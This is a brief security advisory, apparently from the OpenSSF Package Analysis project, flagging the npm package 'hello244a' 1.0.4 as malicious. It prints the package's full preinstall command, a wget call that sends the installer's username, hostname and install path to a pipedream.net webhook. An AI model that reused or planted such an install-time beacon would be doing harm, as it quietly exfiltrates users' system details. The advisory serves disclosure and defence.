The package's package.json declares a preinstall lifecycle script that runs wget --quiet "http://eodxy50gl486xrx.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)". On npm install, the shell expands $(whoami), $(hostname), and $(pwd) and sends the installer's OS username, hostname, and install directory to a third-party pipedream.net webhook over plain HTTP. The package ships no library code — its only effect is the install-time recon beacon. This is a classic dependency-confusion / reconnaissance beacon and constitutes installer data exfiltration to an attacker-controlled endpoint.

The OpenSSF Package Analysis project identified 'hello244a' @ 1.0.4 (npm) as malicious.

It is considered malicious because:

• The package communicates with a domain associated with malicious activity.

• The package executes one or more commands associated with malicious behavior.